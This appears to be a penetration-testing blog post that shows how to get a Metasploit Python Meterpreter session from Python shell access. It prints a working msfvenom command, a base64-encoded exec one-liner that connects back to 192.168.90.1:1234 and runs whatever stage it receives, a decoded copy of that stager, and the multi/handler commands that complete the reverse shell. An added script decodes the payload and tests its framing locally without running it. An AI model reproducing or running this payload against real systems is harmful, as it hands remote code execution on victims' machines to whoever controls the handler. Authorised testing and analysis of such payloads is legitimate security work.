A while ago now, support was added to Metasploit for a native Python Meterpreter. The nice thing about it is that the victim only needs to execute a few short lines of Python.

This means that if you're performing a local lockdown test and manage to get access to a Python shell, it won't take much more effort to turn that into a Meterpreter session.

msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=192.168.90.1 LPORT=1234
import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))

The second line is nothing more than base64-encoded Python, and it is worth decoding anything like this before you run it. Here it is just an eight-line stager that connects back, reads a length-prefixed stage and executes it:

import socket,struct
s=socket.socket(2,1)                  # AF_INET (2), SOCK_STREAM (1): a plain TCP socket
s.connect(('192.168.90.1',1234))      # call back to LHOST:LPORT as given to msfvenom
l=struct.unpack('>I',s.recv(4))[0]    # 4-byte big-endian length of the stage that follows
d=s.recv(4096)
while len(d)!=l:                      # keep reading until the whole stage has arrived
    d+=s.recv(4096)
exec(d,{'s':s})                       # run the stage with the connected socket exposed as 's'
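As an added example (not from the original post and not Metasploit's own code), the script below does two things a tester would want around that one-liner: it decodes the msfvenom output so you can read exactly what would be executed, and it replays the stager's framing (a 4-byte big-endian length followed by the stage) over a local socket pair against a stand-in for the handler, returning the stage bytes instead of exec'ing them. `ONE_LINER` is the msfvenom output copied from above; the handler stand-in and the names `decode_oneliner`, `recv_exact`, `recv_stage`, `send_stage` and `stage_roundtrip` are this example's own, and the stage bytes fed to it are constructed.

```python
"""Added example, not part of the original post or of Metasploit itself.

1. decode_oneliner(): recover the Python hidden inside the msfvenom one-liner
   so it can be read before anything is executed.
2. stage_roundtrip(): replay the stager's framing (4-byte big-endian length,
   then the stage) over a local socket pair, with a hypothetical stand-in for
   the Metasploit handler on the other end. The stage is returned, not exec'd.
"""
import base64
import re
import socket
import struct
import threading

# The msfvenom output from the post, copied verbatim as a string (never executed here).
ONE_LINER = (
    "import base64; exec(base64.b64decode('"
    "aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=="
    "'))"
)


def decode_oneliner(oneliner):
    """Pull the base64 argument out of exec(base64.b64decode('...')) and decode it."""
    m = re.search(r"b64decode\('([A-Za-z0-9+/=]+)'\)", oneliner)
    if m is None:
        raise ValueError("no b64decode('...') argument found")
    return base64.b64decode(m.group(1)).decode()


def recv_exact(sock, n):
    """Read exactly n bytes, looping because recv() may return fewer than asked.

    The real stager trusts s.recv(4) to deliver all four header bytes at once;
    this does the same job defensively.
    """
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(min(4096, n - len(buf)))
        if not chunk:
            raise ConnectionError("peer closed the connection early")
        buf += chunk
    return buf


def recv_stage(sock):
    """Stager side of the exchange: length prefix, then the stage body."""
    (length,) = struct.unpack(">I", recv_exact(sock, 4))
    return recv_exact(sock, length)


def send_stage(sock, stage, fragment=1000):
    """Hypothetical handler side: the prefix, then the stage in small pieces so
    the reassembly loop on the other end is actually exercised."""
    sock.sendall(struct.pack(">I", len(stage)))
    for i in range(0, len(stage), fragment):
        sock.sendall(stage[i:i + fragment])


def stage_roundtrip(stage):
    """Run both halves over socket.socketpair() and return what the stager received."""
    handler, stager = socket.socketpair()
    t = threading.Thread(target=send_stage, args=(handler, stage))
    t.start()
    try:
        return recv_stage(stager)
    finally:
        t.join()
        handler.close()
        stager.close()


if __name__ == "__main__":
    print(decode_oneliner(ONE_LINER))
    # Constructed stand-in for a real stage; a real one would be exec'd by the stager.
    fake_stage = b"# constructed stand-in for a real stage\n" * 300
    got = stage_roundtrip(fake_stage)
    print("received %d bytes, intact: %s" % (len(got), got == fake_stage))
```

Running it prints the decoded stager followed by a confirmation that a 12,000-byte constructed stage survived being sent in 1,000-byte fragments; nothing in the script opens a network connection or executes the stage.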

Then you just need to set up the handler in Metasploit, with LPORT matching the value given to msfvenom (the handler defaults to 4444), and hey presto!

msf3> use exploit/multi/handler
msf3> set payload python/meterpreter/reverse_tcp
msf3> set LHOST 192.168.90.1
msf3> set LPORT 1234
msf3> exploit
